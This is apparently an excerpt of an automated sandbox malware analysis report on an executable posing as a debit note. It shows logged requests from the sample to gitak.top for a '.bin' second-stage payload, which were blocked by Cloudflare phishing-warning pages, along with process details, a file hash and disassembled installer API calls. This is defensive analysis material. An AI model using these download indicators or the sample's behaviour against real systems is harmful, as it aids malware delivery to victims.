2024-08-26 13:39:56 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:39:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10TCmlCXJkrqMEljigA78EIQyt7hOjffvpuakfcI6FzRl%2B8EU%2BsOPRGot8Tud%2B051gvE0GO5QyZT3ngytZxVRC1x3PfnojDD2Mgg3AThbf9lGLUS7tFkd3NBRf4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943b15f8b95943-IAD
2024-08-26 13:39:56 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:39:56 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:39:56 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 70 56 35 65 50 6c 43 73 5a 67 76 58 30 70 50 67 50 37 4b 4f 34 32 37 54 57 4d 2e 67 5a 59 6f 69 58 4f 49 61 4c 68 64 6e 74 34 2d 31 37 32 34 36 37 39 35 39 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="SpV5ePlCsZgvX0pPgP7KO427TWM.gZYoiXOIaLhdnt4-1724679596-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:39:56 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:39:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49862	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:40:06 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:40:07 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:40:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orgAroVsW%2Fgp4aJ6%2Fofnd92RP9B6wuFLRkvQpOrYs5GI5aPKsH4RKnOBctH6%2FFkj6XalEMYmxO7lkMMcYlm6dj7dUoHUbGC6VYaYHBgn%2FCW3mfd%2FFHPJRoHPb6M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943b577f89596d-IAD
2024-08-26 13:40:07 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:40:07 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:40:07 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 63 73 75 5f 48 39 78 72 75 57 4e 78 63 75 54 51 58 46 4a 4f 5a 70 58 66 38 6d 39 50 36 72 70 4d 51 54 64 73 47 73 49 56 57 33 41 2d 31 37 32 34 36 37 39 36 30 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="csu_H9xruWNxcuTQXFJOZpXf8m9P6rpMQTdsGsIVW3A-1724679606-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:40:07 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:40:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	49863	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:40:17 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:40:17 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:40:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qCplPwHOxoM%2BDWbHrv0LAr57vgvfnGebM6ncK5kR1dfQk%2F66Qvdf0ViGBIRUtNsK6jyKCgFy4eAU7Y1eKq%2BrCqLHZpN%2B8uv23zriaMLNGoCegt%2B2iXWikxUr1g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943b990d9d9c48-IAD
2024-08-26 13:40:17 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:40:17 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:40:17 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6a 58 6d 66 31 5a 38 37 7a 6f 38 75 49 70 65 4d 6f 6c 6e 33 50 67 74 50 57 32 4a 76 54 77 51 42 71 77 37 54 51 47 36 62 57 36 67 2d 31 37 32 34 36 37 39 36 31 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="jXmf1Z87zo8uIpeMoln3PgtPW2JvTwQBqw7TQG6bW6g-1724679617-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:40:17 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:40:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:31:51
Start date:	26/08/2024
Path:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
Imagebase:	0x400000
File size:	330'962 bytes
MD5 hash:	5133F0BAA9AB594674EAE836FD1491C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:32:03
Start date:	26/08/2024
Path:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
Imagebase:	0x400000
File size:	330'962 bytes
MD5 hash:	5133F0BAA9AB594674EAE836FD1491C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	18.7%
Total number of Nodes:	1520
Total number of Limit Nodes:	36

Executed Functions

Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403379
SetErrorMode.KERNELBASE(00008001), ref: 00403384
OleInitialize.OLE32(00000000), ref: 0040338B

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55

GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000), ref: 004033DB
CharNextW.USER32(00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000020), ref: 00403403
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
DeleteFileW.KERNELBASE(1033), ref: 004035A1
OleUninitialize.OLE32(?), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000,?), ref: 00403698
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",00000000,?), ref: 004036A4
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
CopyFileW.KERNEL32(C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,0041FEA8,00000001), ref: 00403725
CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
ExitProcess.KERNEL32 ref: 00403827

Strings

1033, xrefs: 0040359C
"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe", xrefs: 004033CE, 004033D4, 004033EB, 004035C9
C:\Users\user\brugerlicensaftalerne, xrefs: 00403520, 0040363E, 004036BD, 004036C7
SeShutdownPrivilege, xrefs: 004037BE
~nsu.tmp, xrefs: 00403692
C:\Users\user\AppData\Local\Temp\, xrefs: 00403530, 00403535, 0040354B, 00403557, 00403566, 00403573, 0040357F, 00403587, 00403697, 004036A3, 004036AF, 004036B6, 00403767
\Temp, xrefs: 00403552
C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 00403649
Low, xrefs: 0040356E
C:\Users\user\Desktop, xrefs: 0040369D, 004036A2, 004036C6
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336D
Error launching installer, xrefs: 00403623
TMP, xrefs: 00403588
C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe, xrefs: 00403720
TEMP, xrefs: 00403580
NSIS Error, xrefs: 004033B9

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe$C:\Users\user\brugerlicensaftalerne$C:\Users\user\brugerlicensaftalerne\Isidora$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-951708311
Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405390
GetDlgItem.USER32(?,000003EE), ref: 0040539F
GetClientRect.USER32(?,?), ref: 004053DC
GetSystemMetrics.USER32(00000015), ref: 004053E4
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
